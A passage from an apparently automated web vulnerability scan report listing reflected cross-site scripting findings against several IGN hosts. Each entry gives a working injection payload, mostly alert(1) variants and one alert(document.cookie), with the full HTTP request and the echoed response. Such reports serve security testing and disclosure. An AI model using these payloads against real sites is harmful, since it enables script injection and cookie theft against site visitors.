Set-Cookie: NGUserID=a016c06-15002-617907217-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043440094v-1n-12mc+1297043440094mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 115897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/857/857126.html?156cf"-alert(1)-"7126e096cae=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.195. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /submit_faq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda0d"><script>alert(1)</script>6f395dd9df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit_faq.html?bda0d"><script>alert(1)</script>6f395dd9df7=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-1058587263-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043453114v-1n-12mc+1297043453114mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/submit_faq.html?bda0d"><script>alert(1)</script>6f395dd9df7=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.196. http://faqs.ign.com/submit_faq.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /submit_faq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a3c"-alert(1)-"f5088556e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /submit_faq.html?67a3c"-alert(1)-"f5088556e3f=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-337717668-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:55 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043455419v-1n-12mc+1297043455419mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/submit_faq.html?67a3c"-alert(1)-"f5088556e3f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.197. http://fimserve.ign.com/ [__ipculture parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The value of the __ipculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16299"%3balert(1)//5f9781b593c was submitted in the __ipculture parameter. This input was echoed as 16299";alert(1)//5f9781b593c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299"%3balert(1)//5f9781b593c HTTP/1.1
Host: fimserve.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: 585087c32e9d95876419f11bda2d6d63409345d960d798fa
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3898


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
itionalPageBeaconKVPs && MySpace.AdditionalPageBeaconKVPs.abtest)
               adData.abtest = MySpace.AdditionalPageBeaconKVPs.abtest;
           MySpace.Beacon.Request(adData);
       }
   }
}
var __ipculture = "nl-nl16299";alert(1)//5f9781b593c";
var google_page_url = "http://fimserve.ign.com/?placement=fim_ign_hub2&__preferredculture=nl-NL&__ipculture=nl-NL16299%3balert1//5f9781b593c&__preferredculture=sv-SE&__ipculture=sv-SE";
var google_a
...[SNIP]...

1.198. http://fimserve.ign.com/ [__preferredculture parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The value of the __preferredculture request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d34"%3balert(1)//b1eedcf262 was submitted in the __preferredculture parameter. This input was echoed as e8d34";alert(1)//b1eedcf262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&__preferredculture=nl-NLe8d34"%3balert(1)//b1eedcf262&__ipculture=nl-NL HTTP/1.1
Host: fimserve.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040527191%7C1299632527191%3B%20s_lv%3D1297040527193%7C1391648527193%3B%20s_lv_s%3DFirst%2520Visit%7C1297042327193%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: 0dc60cc1f9e03db8d0908393da041b991653c74650a9da13
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; domain=.ign.com; expires=Wed, 09-Mar-2011 01:51:06 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3896


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
re=nl-NL&__ipculture=nl-NL";
var google_ad_type = "text";
var google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_max_num_ads = 4;
var google_ad_output = "js";
var __preferredculture = "nl-nle8d34";alert(1)//b1eedcf262";
var afcxml = "false";
var google_adtest = "off";
var google_ed = "";
var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_safe = "high";
var google_encoding = "utf8";
document.write(
...[SNIP]...

1.199. http://fimserve.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fimserve.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c781b%3balert(1)//80b384a2d70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c781b;alert(1)//80b384a2d70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?placement=fim_ign_hub2&c781b%3balert(1)//80b384a2d70=1 HTTP/1.1
Host: fimserve.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Server: b8847bfb2c7b896bf4dec7d1eb7325a2cc7709a8ba56094f
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326085558429262&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; domain=.ign.com; expires=Wed, 09-Mar-2011 01:02:35 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3806


function google_ad_request_done(google_ads)
{
   var i = 0;
   if (google_ads == null || google_ads.length == 0) return;
   var ctl = null;
   var str = '';
           str = '';
       document.write('<STYLE> #ad-
...[SNIP]...
ype = "text";
var google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_encoding = "utf8";
var google_ad_output = "js";
var afcxml = "false";
var google_adtest = "off";
var google_ed = "";
var c781b;alert(1)//80b384a2d70 = 1;
var dw_google_ad_client = "ca-fim_ign_intl_emea_asia_js";
var google_safe = "high";
var google_max_num_ads = 4;
document.write('<script type="text/javascript" language="JavaScript" src="http://pa
...[SNIP]...

1.200. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /k/wns6kpl-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47353<script>alert(1)</script>ff7250afcdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000819
Content-Length: 68
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:02:35 GMT
Connection: close

Not Found: /k47353<script>alert(1)</script>ff7250afcdc/wns6kpl-e.css

1.201. http://fonts.ignimgs.com/k/wns6kpl-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /k/wns6kpl-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 791d8<script>alert(1)</script>1d99e800ce7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7?3bb2a6e53c9684ffdc9a9af0135b2a62b7764f55d1e067ec9f69cfb2891eae51afd646b11f42b8b0c203da5976966e37dcb426c843edabe5098a840fe470829f52f661b12a HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000773
Content-Length: 68
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:02:36 GMT
Connection: close

Not Found: /k/wns6kpl-e.css791d8<script>alert(1)</script>1d99e800ce7

1.202. http://fonts.ignimgs.com/wns6kpl.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.ignimgs.com
Path:   /wns6kpl.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4490<script>alert(1)</script>adea6fcc8da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da HTTP/1.1
Host: fonts.ignimgs.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001293
Content-Length: 63
Cache-Control: max-age=31536000
Date: Mon, 07 Feb 2011 01:11:16 GMT
Connection: close

Not Found: /wns6kpl.jsb4490<script>alert(1)</script>adea6fcc8da

1.203. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1146317p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77882"><script>alert(1)</script>eae0eba9c8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1146317p1.html?77882"><script>alert(1)</script>eae0eba9c8b=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-1188017689-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043485979v-1n-12mc+1297043485979mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1146317p1.html?77882"><script>alert(1)</script>eae0eba9c8b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.204. http://games.ign.com/articles/114/1146317p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1146317p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea3b2"-alert(1)-"4bf55089e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32463-1932835831-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487858v-1n-12mc+1297043487858mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1146317p1.html?ea3b2"-alert(1)-"4bf55089e71=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.205. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934c.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd916"><script>alert(1)</script>af064e2c58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147934c.html?dd916"><script>alert(1)</script>af064e2c58b=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1500894823-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487464v-1n-12mc+1297043487464mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 83048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1147934c.html?dd916"><script>alert(1)</script>af064e2c58b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.206. http://games.ign.com/articles/114/1147934c.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934c.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fd5c"-alert(1)-"ff30ee90d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-14395-551436527-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:29 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043489796v-1n-12mc+1297043489796mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 83820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1147934c.html?4fd5c"-alert(1)-"ff30ee90d17=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.207. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92fe"-alert(1)-"f38442978de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
